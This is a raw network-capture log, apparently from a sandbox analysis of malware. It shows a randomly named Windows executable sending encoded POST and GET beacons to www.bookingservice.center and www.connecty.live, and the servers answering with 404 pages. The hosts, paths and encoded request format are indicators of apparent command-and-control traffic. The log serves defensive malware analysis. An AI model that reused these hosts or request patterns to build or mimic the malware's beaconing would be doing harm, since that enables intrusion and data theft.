                                                                                                                        Nov 20, 2024 16:55:29.630335093 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        Date: Wed, 20 Nov 2024 15:55:28 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 1245
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                        Nov 20, 2024 16:55:29.630358934 CET218INData Raw: 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e
                                                                                                                        Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        18192.168.2.114999398.124.224.17803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:55:31.094716072 CET821OUTPOST /4bee/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.bookingservice.center
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 219
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.bookingservice.center
                                                                                                                        Referer: http://www.bookingservice.center/4bee/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 44 55 79 72 41 74 31 36 36 2b 4e 64 47 33 43 55 55 5a 69 2b 42 49 36 48 45 6b 45 78 69 6f 4a 41 71 58 63 70 6a 34 54 65 46 68 36 46 73 77 44 35 74 78 72 54 44 41 70 32 59 6b 73 53 4b 47 37 42 6a 78 4f 74 37 6a 77 4a 31 41 52 61 58 57 48 52 49 4a 49 57 69 74 65 4a 69 6c 59 6a 67 61 72 76 5a 4a 5a 63 45 44 41 64 46 68 61 38 65 59 62 70 4d 68 6b 63 37 4b 36 74 31 57 54 47 47 74 77 66 68 30 38 4d 53 54 6b 6c 6e 4d 72 6f 41 64 30 48 48 2b 68 77 4e 4a 2f 6f 72 53 74 42 77 4c 49 65 44 31 74 6d 50 4b 32 66 50 6f 44 5a 2b 69 63 73 63 50 54 70 76 6d 35 59 44 5a 59 49 56 48 58 45 55 75 4e 79 2f 44 48 49 72 6c 6a 72 39 6f 45 2f 66 78 42 42 68 48 38 3d
                                                                                                                        Data Ascii: KV=DUyrAt166+NdG3CUUZi+BI6HEkExioJAqXcpj4TeFh6FswD5txrTDAp2YksSKG7BjxOt7jwJ1ARaXWHRIJIWiteJilYjgarvZJZcEDAdFha8eYbpMhkc7K6t1WTGGtwfh08MSTklnMroAd0HH+hwNJ/orStBwLIeD1tmPK2fPoDZ+icscPTpvm5YDZYIVHXEUuNy/DHIrljr9oE/fxBBhH8=
                                                                                                                        Nov 20, 2024 16:55:32.286128044 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        Date: Wed, 20 Nov 2024 15:55:32 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 1245
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                        Nov 20, 2024 16:55:32.286179066 CET218INData Raw: 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e
                                                                                                                        Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        19192.168.2.114999598.124.224.17803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:55:33.790893078 CET1834OUTPOST /4bee/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.bookingservice.center
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 1231
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.bookingservice.center
                                                                                                                        Referer: http://www.bookingservice.center/4bee/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 44 55 79 72 41 74 31 36 36 2b 4e 64 47 33 43 55 55 5a 69 2b 42 49 36 48 45 6b 45 78 69 6f 4a 41 71 58 63 70 6a 34 54 65 46 68 79 46 73 43 37 35 73 53 54 54 41 41 70 32 62 6b 73 54 4b 47 37 6d 6a 78 57 70 37 6a 39 2b 31 44 70 61 46 67 54 52 41 59 49 57 35 39 65 4a 75 46 59 6d 39 4b 72 32 5a 4e 31 59 45 44 77 64 46 68 61 38 65 64 58 70 46 56 49 63 30 71 36 75 32 57 54 61 43 74 78 36 68 33 4d 32 53 53 52 48 6e 59 66 6f 41 39 45 48 46 4d 5a 77 42 4a 2f 71 6f 53 74 76 77 4c 46 41 44 31 77 5a 50 4c 53 31 50 6f 4c 5a 38 6d 35 78 49 64 50 64 38 32 4a 59 42 49 6f 79 63 31 58 67 56 74 4a 58 79 67 7a 75 70 79 48 74 78 34 4e 71 61 6b 4a 51 67 53 30 66 43 6d 74 4a 4e 6f 47 66 53 36 61 66 7a 7a 6e 4b 58 4a 53 35 6d 41 4a 49 43 4a 38 75 32 37 75 62 69 75 2b 42 6b 70 37 4b 35 34 45 54 64 63 6a 57 6f 4d 71 6c 2b 2f 4b 32 6c 44 42 76 6a 46 75 69 47 54 53 6f 6d 69 34 49 6b 33 36 34 42 61 61 4a 77 39 42 4f 62 56 66 39 4a 38 2b 49 41 75 55 64 77 4c 79 54 48 57 51 52 48 4f 66 53 6d 62 46 77 4a 6a 79 51 65 69 70 [TRUNCATED]
                                                                                                                        Data Ascii: KV=DUyrAt166+NdG3CUUZi+BI6HEkExioJAqXcpj4TeFhyFsC75sSTTAAp2bksTKG7mjxWp7j9+1DpaFgTRAYIW59eJuFYm9Kr2ZN1YEDwdFha8edXpFVIc0q6u2WTaCtx6h3M2SSRHnYfoA9EHFMZwBJ/qoStvwLFAD1wZPLS1PoLZ8m5xIdPd82JYBIoyc1XgVtJXygzupyHtx4NqakJQgS0fCmtJNoGfS6afzznKXJS5mAJICJ8u27ubiu+Bkp7K54ETdcjWoMql+/K2lDBvjFuiGTSomi4Ik364BaaJw9BObVf9J8+IAuUdwLyTHWQRHOfSmbFwJjyQeipcfTl7qBhLdzVk/p8wMjkX2PHqzLJsZHOWEBLcHOezSw+yZGPbl9KOQgLFThPmOV871R/0Kz8wz2Nie8lUCEwnTMMLRex/9lE63oHwhn9nTI6UYoy+Aq4dHsk/nF5GaznHZGrekKSPa2EVuA6WtF4eK0Pyk0VKgVm/VA0Ktkja0ZbQrG55X2uOvgrPo/9Mx5rBDgDlxkyA0zZ29L318qvTU9ywUEC8jUCSbbb2BZK9GbLfi6pCC+OtSICN/tyX2+pse0l1q0R1DNmPk3E+mrIp0Xat70D71x/anl1SKHuySn5O/VxanWr9wEaojhwuBmk3kkNdpAlWlTJjfzFINFzyX4FQ9gRvQwqrXB2d6M4G9ppBjRvcWFtfBUIIM+QugEDPeSSnnALeUR07ZJIHS5anWVRf/36zl/N+7SKt0Uo8dOCJVpfbW2ZyNDxoTlkT8yuhKr2oEu3e1QEk6J8PIMGNY3KpBMNXTWFzoJo2rN7Qx7ILuFezKzoDPLavLSAuT4xmIuIZuQ5+LMbCRFJiQ2vmBQu9Kf0PjRAJgZyprw1aHxko/qCiNSvcL0JJHWT03exNwmH7Q7nhOXbNdjQfL8dw7E3DV8evOBFPda7IiQNCIdmQ/W6nmsQh1ujBwvQ5L1q7ht7bpUnKxtOFOkq1Rx8ug/D82rVKt7g42 [TRUNCATED]
                                                                                                                        Nov 20, 2024 16:55:34.993669987 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        Date: Wed, 20 Nov 2024 15:55:34 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 1245
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                        Nov 20, 2024 16:55:34.993690968 CET218INData Raw: 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e
                                                                                                                        Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        20192.168.2.114999698.124.224.17803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:55:36.450654030 CET513OUTGET /4bee/?KV=OWaLDb1Jm9p4bkDVec29BoDmBVET5eJeilgKnYToBBeYyiPSqC7oM1F3UnEyEVbrshSo8g4GkysDEHe9VbsXh/SWnXsZyYCMcK4IBi4/IwS5Oa2XQ2sC/aw=&Wno=a0qDq HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Host: www.bookingservice.center
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Nov 20, 2024 16:55:37.658292055 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        Date: Wed, 20 Nov 2024 15:55:36 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 1245
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                        Nov 20, 2024 16:55:37.658318996 CET218INData Raw: 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e
                                                                                                                        Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        21192.168.2.1149997203.161.43.228803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:55:43.373070955 CET777OUTPOST /q6ws/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.connecty.live
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 199
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.connecty.live
                                                                                                                        Referer: http://www.connecty.live/q6ws/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 37 54 71 35 63 4d 4f 55 4f 73 44 79 68 6f 7a 37 50 31 4f 54 2f 31 79 79 5a 4b 41 47 36 6f 5a 77 2f 57 6c 5a 48 6b 57 76 4a 63 59 56 63 79 6d 53 49 42 42 62 4d 6d 2f 70 39 34 78 78 4c 48 57 56 62 6d 54 58 6d 6e 2f 32 6d 46 54 50 64 6f 45 79 6d 78 78 58 46 30 65 46 4a 48 6d 78 4c 69 37 35 2f 48 32 6b 52 79 7a 46 36 2f 35 41 47 46 73 4a 6a 70 37 2b 35 6d 2b 68 33 42 37 6c 73 37 6b 6a 57 35 4a 59 63 30 34 49 4a 38 41 62 39 73 46 33 4c 76 6d 45 69 53 78 55 53 74 4f 74 56 4f 62 63 58 4a 66 37 5a 31 42 46 7a 32 4b 46 49 30 68 74 78 50 6f 68 35 50 30 34 77 63 34 55 59 2b 61 57 37 67 3d 3d
                                                                                                                        Data Ascii: KV=7Tq5cMOUOsDyhoz7P1OT/1yyZKAG6oZw/WlZHkWvJcYVcymSIBBbMm/p94xxLHWVbmTXmn/2mFTPdoEymxxXF0eFJHmxLi75/H2kRyzF6/5AGFsJjp7+5m+h3B7ls7kjW5JYc04IJ8Ab9sF3LvmEiSxUStOtVObcXJf7Z1BFz2KFI0htxPoh5P04wc4UY+aW7g==
                                                                                                                        Nov 20, 2024 16:55:44.638000011 CET658INHTTP/1.1 404 Not Found
                                                                                                                        Date: Wed, 20 Nov 2024 15:55:44 GMT
                                                                                                                        Server: Apache
                                                                                                                        Content-Length: 514
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        22192.168.2.1149998203.161.43.228803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:55:46.038263083 CET797OUTPOST /q6ws/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.connecty.live
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 219
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.connecty.live
                                                                                                                        Referer: http://www.connecty.live/q6ws/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
